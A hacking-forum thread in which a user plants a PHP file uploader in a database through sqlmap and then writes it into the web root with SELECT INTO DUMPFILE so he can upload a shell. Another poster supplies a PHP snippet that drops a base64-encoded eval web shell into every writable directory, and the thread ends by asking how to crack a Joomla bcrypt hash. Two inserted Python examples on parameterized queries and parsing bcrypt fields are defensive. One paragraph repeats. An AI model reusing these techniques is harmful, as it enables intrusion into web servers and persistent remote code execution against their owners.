MySQL problem with inserting PHP code into DB


DrMTR

Hi to all !

I am testing a vulnerable app on localhost and trying to insert PHP upload form code into a DB table, but it gives me a MySQL syntax error every time I try.

This HTML form was successfully inserted into the DB via sqlmap:

insert into userform values ('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> 
<head>Upload File</head>
<body>
<form enctype="multipart/form-data" action="uploader.php" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="100000" />
Choose a file to upload: <input name="uploadedfile" type="file" /><br />
<input type="submit" value="Upload File" />
</form>
</body>
</html>');

but this gives me an SQL syntax error at line 1 every time I try to insert it into the DB:

insert into user_upload values ('
<?php
$target_path = '/var/www/';

$target_path = $target_path . basename( $_FILES['uploadedfile']['name']); 

if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
    echo "The file ".  basename( $_FILES['uploadedfile']['name']). 
    " has been uploaded";
} else{
    echo "There was an error uploading the file, please try again!";
}
?>');

Where is the problem?

I forgot to mention that the DB tables are already created in the DB exploitdb.

You have a quoted string which you are breaking out of with the quotes in the lines you are injecting; try changing all the quotes in the string to double quotes and the outside ones to single.

Sounds like an interesting vulnerability where you can pull contents from a database and get them executed.

The way SQL works is that when you want to put a string in a column, you say:

insert into table (column_name) values ('THE_DATA_TO_INSERT');

Note that the data to insert into column_name is delimited by the single quotes. When that THE_DATA_TO_INSERT itself contains single quotes, you need to escape them either by preceding each single quote with a slash (\') or, because HTML allows you to do this, use a double quote (") instead of the single quote character in your data.
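
The point above, shown in running code. This is an added example, not code from the thread: it uses Python's standard-library sqlite3 module as a stand-in for MySQL, so the escaping shown is the standard-SQL rule of doubling the single quote (which MySQL also accepts) rather than the MySQL-only backslash form, and the error message text differs from MySQL's "syntax error" wording. The sample text is constructed; the table name user_upload is taken from the thread. The third function, parameter binding, is the form a defender wants in real code, because the driver sends the value separately from the statement and no character in the data can change the SQL grammar.

```python
"""Why a single quote inside a string literal breaks the INSERT, and how
escaping or (preferably) parameter binding avoids it.  Added example; uses
sqlite3 as a stand-in for MySQL (assumption noted in the lead-in)."""
import sqlite3

# Constructed sample: a line of text that contains single quotes, like the
# PHP snippet in the thread.
SAMPLE_TEXT = "$target_path = '/var/www/';"


def make_db():
    """Fresh in-memory database with a one-column table (constructed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_upload (content TEXT)")
    return conn


def insert_by_concatenation(conn, text):
    """Builds the statement by gluing the data between two quotes.  The first
    ' inside `text` terminates the literal early and the remainder is parsed
    as SQL, so the database rejects the statement.  Returns the error message,
    or None if the statement unexpectedly succeeded."""
    sql = "INSERT INTO user_upload VALUES ('" + text + "')"
    try:
        conn.execute(sql)
        return None
    except sqlite3.Error as exc:
        return str(exc)


def escape_literal(text):
    """Standard-SQL escaping: double every single quote inside the literal."""
    return "'" + text.replace("'", "''") + "'"


def insert_escaped(conn, text):
    """Works, but every code path must remember to escape; easy to get wrong."""
    conn.execute("INSERT INTO user_upload VALUES (" + escape_literal(text) + ")")
    conn.commit()


def insert_parameterized(conn, text):
    """Preferred form: the value never touches the SQL text at all."""
    conn.execute("INSERT INTO user_upload VALUES (?)", (text,))
    conn.commit()


def stored_rows(conn):
    """Return the stored strings so the result can be checked exactly."""
    return [row[0] for row in conn.execute("SELECT content FROM user_upload")]


def demo():
    """Run the three variants on one database: the first fails, the other
    two store the text verbatim."""
    conn = make_db()
    err = insert_by_concatenation(conn, SAMPLE_TEXT)
    insert_escaped(conn, SAMPLE_TEXT)
    insert_parameterized(conn, SAMPLE_TEXT)
    return err, stored_rows(conn)


if __name__ == "__main__":
    err, rows = demo()
    print("concatenation failed with:", err)
    print("stored rows:", rows)
```

Running it prints the database's complaint for the concatenated statement and then two identical stored rows, both containing the single quotes unchanged. The "swap to double quotes" advice in the thread works only because the data happens to tolerate it; escaping or binding works for any data.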

If you look at the syntax-highlighted code you've provided, you'll see that in the first example all that is being inserted is green, meaning it is all considered a single string; in the second example, where the single quotes are closed early, the text changes to black and then back to green where the single quotes open again.

If you look at the syntax-highlighted code you've provided, you'll see that in the first example all that is being inserted is green, meaning it is all considered a single string; in the second example, where the single quotes are closed early, the text changes to black and then back to green where the single quotes open again.

So in fact, if I change the "black-highlighted text" to use " " it will be OK?

insert into user_upload values ('
<?php
$target_path = "/var/www/";

$target_path = $target_path . basename( $_FILES["uploadedfile"]["name"]); 

if(move_uploaded_file($_FILES["uploadedfile"]["tmp_name"], $target_path)) {
    echo "The file ".  basename( $_FILES["uploadedfile"]["name"]). 
    " has been uploaded";
} else{
    echo "There was an error uploading the file, please try again!";
}
?>');

Yeah, the SQL code was inserted into the DB table and executes as the evil PHP uploader.

Grab the content from the SQL table and dump it to a .php file using these commands:

select * into dumpfile '/var/www/uploadform.php' from userform;

select * into dumpfile '/var/www/uploader.php' from user_upload;


After that simply execute uploadform.php and upload your favorite shell to the host. Thanks for everything guys. :)

Or have local file inclusion.

I tend to look for file upload features on sites which allow uploads into the document root, usually folders called userdata or uploads; they are writable when the rest isn't.

I'll provide some of my exciting automation :-p

This little snippet will recursively scan directories for writable permissions and then write a small shell...

If you have PHP execution (phpinfo();), then try eval(code below);

Careful, this may write a few thousand shells to your hard drive :-)

chdir('../');
$path = realpath(getcwd());
$objects = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path), RecursiveIteratorIterator::SELF_FIRST);
foreach($objects as $name => $object){
        if (is_dir($name)) {
                if (is_writable($name))  {
                        echo $name . ' ';
                        file_put_contents($name. '/tmp.php', base64_decode("PD9ldmFsKGJhc2U2NF9kZWNvZGUoJF9HRVRbY214eXpdKSk7Pz4="));
                }
        }
}

^^ Thanks for the script. It's very useful for finding writable folders. I don't want to open a new thread; does someone know why this Joomla hash is very long compared with the other hashes in the DB?

$2y$10$bTQfeWF8vHD3BJ/RvoMm4uLWBD02O/YPQN9Y0NfiRlHyHlmD1FmB.

How to crack this one?

Fields are separated by the $ character.

2y means "The most secure version of Blowfish"

10 is the number of Blowfish iterations.

The remainder is the blowfish hash where I suspect the bit up to the slash is the salt and the remainder the actual hash value.
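
A small parser for the field layout of such a hash, added here as an example and not code from the thread. It follows the bcrypt modular-crypt format as bcrypt defines it: `$` variant `$` two-digit cost `$`, then a 22-character salt immediately followed by a 31-character hash, both in bcrypt's own base64 alphabet (./A-Za-z0-9); the cost is the base-2 logarithm of the key-setup round count. The only input is the hash quoted above; the variant descriptions in the table are background facts, not something the thread states. The reason the string is longer than an MD5 hash is that the salt, the cost and the variant are stored inline, and the cost is the knob a defender raises to make each guess slower.

```python
"""Split a bcrypt string into its fields (added example, not from the thread)."""
import re

# Hash quoted in the thread; Joomla stores bcrypt in this form.
SAMPLE_HASH = "$2y$10$bTQfeWF8vHD3BJ/RvoMm4uLWBD02O/YPQN9Y0NfiRlHyHlmD1FmB."

# Variant identifiers encountered in practice.
VARIANTS = {
    "2": "original bcrypt",
    "2a": "revision fixing handling of non-ASCII characters and the null terminator",
    "2x": "hashes produced by the pre-2011 crypt_blowfish with the sign-extension bug",
    "2y": "crypt_blowfish 1.1+ with that bug fixed (what PHP's crypt()/password_hash emit)",
    "2b": "OpenBSD 2014 revision (fixed a wraparound for very long passwords)",
}

# 7-character prefix "$2y$10$" + 22-character salt + 31-character hash = 60 characters.
BCRYPT_RE = re.compile(
    r"^\$(?P<variant>2[abxy]?)\$(?P<cost>\d{2})\$"
    r"(?P<salt>[./A-Za-z0-9]{22})(?P<hash>[./A-Za-z0-9]{31})$"
)


def parse_bcrypt(text):
    """Return a dict of the fields, or raise ValueError if `text` is not bcrypt."""
    m = BCRYPT_RE.match(text)
    if m is None:
        raise ValueError("not a bcrypt modular-crypt string")
    cost = int(m.group("cost"))
    if not 4 <= cost <= 31:  # range allowed by the bcrypt specification
        raise ValueError("bcrypt cost must be between 04 and 31")
    return {
        "variant": m.group("variant"),
        "variant_note": VARIANTS.get(m.group("variant"), "unknown"),
        "cost": cost,
        "rounds": 2 ** cost,  # key-setup rounds; cost 10 means 1024
        "salt": m.group("salt"),
        "hash": m.group("hash"),
        "total_length": len(text),
    }


def is_bcrypt(text):
    """Cheap check for triage: does this stored value look like bcrypt at all?"""
    return BCRYPT_RE.match(text) is not None


if __name__ == "__main__":
    for key, value in parse_bcrypt(SAMPLE_HASH).items():
        print(f"{key:>13}: {value}")
```

For the hash above the parser reports variant 2y, cost 10 (1024 rounds), a 22-character salt and a 31-character hash, 60 characters in total; a 32-character hex MD5 value fails the check, which is a quick way to tell the two apart when auditing a user table.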
